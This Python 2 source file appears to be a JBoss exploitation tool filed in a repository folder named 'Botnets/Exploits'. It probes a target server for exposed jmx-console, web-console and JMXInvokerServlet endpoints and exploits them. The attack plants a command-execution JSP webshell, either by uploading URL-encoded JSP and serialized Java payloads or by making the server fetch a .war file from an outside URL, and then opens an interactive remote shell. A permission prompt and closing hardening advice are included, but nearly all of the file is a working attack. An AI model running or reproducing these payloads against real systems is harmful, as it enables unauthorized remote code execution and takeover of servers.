Path: blob/master/Botnets/Exploits/JBOSS FULL/exploit.py
import httplib, sys, urllib, os, time1from urllib import urlencode23RED = '\x1b[91m'4RED1 = '\033[31m'5BLUE = '\033[94m'6GREEN = '\033[32m'7BOLD = '\033[1m'8NORMAL = '\033[0m'9ENDC = '\033[0m'1011def getHost(url):12tokens = url.split("://")13if len(tokens) == 2: #foi fornecido protocolo14return tokens[1].split(":")[0]15else:16return tokens.split(":")[0]1718def getProtocol(url):19tokens = url.split("://")20if tokens[0] == "https":21return "https"22else:23return "http"2425def getPort(url):26token = url[6:].split(":")27if len(token) == 2:28return token[1]29elif getProtocol(url) == "https":30return 44331else:32return 803334def getConnection(url):35if getProtocol(url) == "https":36return httplib.HTTPSConnection(getHost(url), getPort(url))37else:38return httplib.HTTPConnection(getHost(url), getPort(url))394041def getSuccessfully(url, path):42result = 40443time.sleep(5)44conn = getConnection(url)45conn.request("GET", path)46result = conn.getresponse().status47if result == 404:48conn.close()49time.sleep(7)50conn = getConnection(url)51conn.request("GET", path)52result = conn.getresponse().status53conn.close()54return result5556def checkVul(url):5758print ( GREEN +" ** Checking Host: %s **\n" %url )5960path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",61"web-console" : "/web-console/ServerInfo.jsp",62"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}6364for i in path.keys():65try:66print GREEN + " * Checking %s: \t" %i + ENDC,67conn = getConnection(url)68conn.request("HEAD", path[i])69path[i] = conn.getresponse().status70if path[i] == 200 or path[i] == 500:71print RED + "[ VULNERABLE ]" + ENDC72else: print GREEN + "[ SAFE ]"73conn.close()74except:75print RED + "\n * An error ocurred while connecting to the host %s\n" %url + ENDC76path[i] = 5057778return path7980def autoExploit(url, type):8182# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 583# exploitJmxConsoleMainDeploy: tested and working in 
jboss 4 and 684# exploitWebConsoleInvoker: tested and working in jboss 485# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 58687print GREEN + ("\n * Exploiting %s. Wait...\n" %url)88result = 50589if type == "jmx-console":90result = exploitJmxConsoleFileRepository(url)91if result != 200 and result != 500:92result = exploitJmxConsoleMainDeploy(url)93elif type == "web-console":94result = exploitWebConsoleInvoker(url)95elif type == "JMXInvokerServlet":96result = exploitJMXInvokerFileRepository(url)9798if result == 200 or result == 500:99print GREEN + " * Successfully Exploiting! Starting Admin Command Shell...\n" + ENDC100shell_http(url, type)101else:102print (RED + "\n * Target \n"103" Waiting for 7 seconds...\n "+ ENDC)104time.sleep(7)105106def shell_http(url, type):107if type == "jmx-console" or type == "web-console":108path = '/jbossass/jbossass.jsp?'109elif type == "JMXInvokerServlet":110path = '/shellinvoker/shellinvoker.jsp?'111112conn = getConnection(url)113conn.request("GET", path)114conn.close()115time.sleep(7)116resp = ""117#clear()118print " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - * \n"119print RED+" * "+url+": \n"+ENDC120headers = {"User-Agent" : "jexboss"}121for cmd in ['uname -a', 'cat /etc/issue', 'id']:122conn = getConnection(url)123cmd = urlencode({"ppp": cmd})124conn.request("GET", path+cmd, '', headers)125resp += " "+conn.getresponse().read().split(">")[1]126print resp,127128while 1:129print BLUE + "[Type commands or \"exit\" to finish]"130cmd=raw_input("Shell> "+ENDC)131#print ENDC132if cmd == "exit":133break134conn = getConnection(url)135cmd = urlencode({"ppp": cmd})136conn.request("GET", path+cmd, '', headers)137resp = conn.getresponse()138if resp.status == 404:139print RED+ " * Error contacting the commando shell. Try again later..."140conn.close()141continue142stdout = ""143try:144stdout = resp.read().split("pre>")[1]145except:146print RED+ " * Error contacting the commando shell. 
Try again later..."147if stdout.count("An exception occurred processing JSP page") == 1:148print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC149else: print stdout,150conn.close()151152def exploitJmxConsoleMainDeploy(url):153# MainDeployer154# does not work in jboss5 (bug in jboss5)155# shell in link156# /jmx-console/HtmlAdaptor157jsp = "http://www.joaomatosf.com/rnp/jbossass.war"158payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"159"=MainDeployer&methodIndex=19&arg0="+jsp)160print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "161"\n available on: "+jsp +ENDC)162conn = getConnection(url)163conn.request("HEAD", payload)164result = conn.getresponse().status165conn.close()166return getSuccessfully(url, "/jbossass/jbossass.jsp")167168def exploitJmxConsoleFileRepository(url):169# DeploymentFileRepository170# tested and work in jboss4, 5.171# doest not work in jboss6172# shell jsp173# /jmx-console/HtmlAdaptor174jsp 
=("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"175"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"176"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"177"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"178"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"179"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"180"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"181"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"182"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"183"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"184"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"185"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"186"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"187"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"188"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"189"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"190"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"191"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )192193payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="194"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="195"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"196"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")197198conn = getConnection(url)199conn.request("HEAD", payload)200result = conn.getresponse().status201conn.close()202return getSuccessfully(url, "/jbossass/jbossass.jsp")203204def exploitJMXInvokerFileRepository(url):205# tested and work in jboss4, 5206# MainDeploy, shell in data207# /invoker/JMXInvokerServlet208payload = ( 
"\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"209"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"210"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"211"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"212"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"213"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"214"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"215"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"216"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"217"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"218"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"219"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"220"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"221"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"222"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"223"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"224"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"225"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"226"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"227"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"228"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"229"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"230"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"231"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"232"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"233"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"234"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"235"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"236"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"23
7"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"238"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"239"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"240"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"241"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"242"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"243"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"244"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"245"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"246"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"247"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"248"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"249"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"250"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"251"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"252"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"253"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"254"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"255"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"256"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"257"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"258"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"259"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"260"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"261"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"262"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"263"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"264"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"265"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"2
66"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"267"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"268"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"269"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"270"\x00\x04\x70\x78")271conn = getConnection(url)272headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",273"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}274conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)275response = conn.getresponse()276result = response.status277if result == 401:278print " Retrying..."279conn.close()280conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)281response = conn.getresponse()282result = response.status283if response.read().count("Failed") > 0:284result = 505285conn.close286return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")287288def exploitWebConsoleInvoker(url):289# does not work in jboss5 (bug in jboss5)290# MainDeploy, shell in link291# /web-console/Invoker292#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"293#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)294#jsp = "\\x" + jsp295payload = ( 
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"296"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"297"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"298"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"299"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"300"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"301"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"302"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"303"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"304"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"305"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"306"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"307"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"308"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"309"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"310"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"311"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"312"\x2a"313#link314"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"315"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"316"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"317#end318"\x75\x72\x00\x13\x5b"319"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"320"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"321"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"322"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"323"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"324"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"325"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"326"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"327"\x70\x6c\x6f\x79\x65\x72\x78")328conn = 
getConnection(url)329headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",330"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}331conn.request("POST", "/web-console/Invoker", payload, headers)332response = conn.getresponse()333result = response.status334if result == 401:335print " Retrying..."336conn.close()337conn.request("HEAD", "/web-console/Invoker", payload, headers)338response = conn.getresponse()339result = response.status340conn.close341return getSuccessfully(url, "/jbossass/jbossass.jsp")342343344def clear():345if os.name == 'posix':346os.system('clear')347elif os.name == ('ce', 'nt', 'dos'):348os.system('cls')349350def checkArgs(args):351if len(args) < 2 or args[1].count('.') < 1:352return 1,"You must provide the host name or IP address you want to test."353elif len(args[1].split('://')) == 1:354return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])355elif args[1].count('http') == 1 and args[1].count('.') > 1:356return 0, ""357else:358return 1, 'Invalid parameter'359360# check python version361if sys.version_info[0] == 3:362print (RED + "\n * Not compatible with version 3 of python.\n"363" Please run it with version 2.7 or lower.\n\n"364+BLUE+" * Example:\n"365" python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )366sys.exit(1)367368# check Args369status, message = checkArgs(sys.argv)370if status == 0:371url = sys.argv[1]372elif status == 1:373print RED + "\n * Error: %s" %message374print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC375sys.exit(status)376elif status == 2:377url = ''.join(['http://',sys.argv[1]])378379# check vulnerabilities380mapResult = checkVul(url)381382# performs exploitation383for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:384if mapResult[i] == 200 or mapResult[i] == 500:385print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"386" This 
operation will provide a simple command shell to execute commands on the server..\n"387+RED+" Continue only if you have permission!" +ENDC)388if raw_input(" yes/NO ? ").lower() == "yes":389autoExploit(url, i)390391# resume results392if mapResult.values().count(200) > 0:393banner()394print RED+ " Results: potentially compromised server!" +ENDC395print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"396" Recommendations: \n"397" - Remove web consoles and services that are not used, eg:\n"398" $ rm web-console.war\n"399" $ rm http-invoker.sar\n"400" $ rm jmx-console.war\n"401" $ rm jmx-invoker-adaptor-server.sar\n"402" $ rm admin-console.war\n"403" - Use a reverse proxy (eg. nginx, apache, f5)\n"404" - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"405" - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"406" References:\n"407" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"408" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"409"\n"410" - If possible, discard this server!\n\n"411" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )412elif mapResult.values().count(505) == 0:413print ( GREEN+ "\n\n * Results: \n"414" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)415416417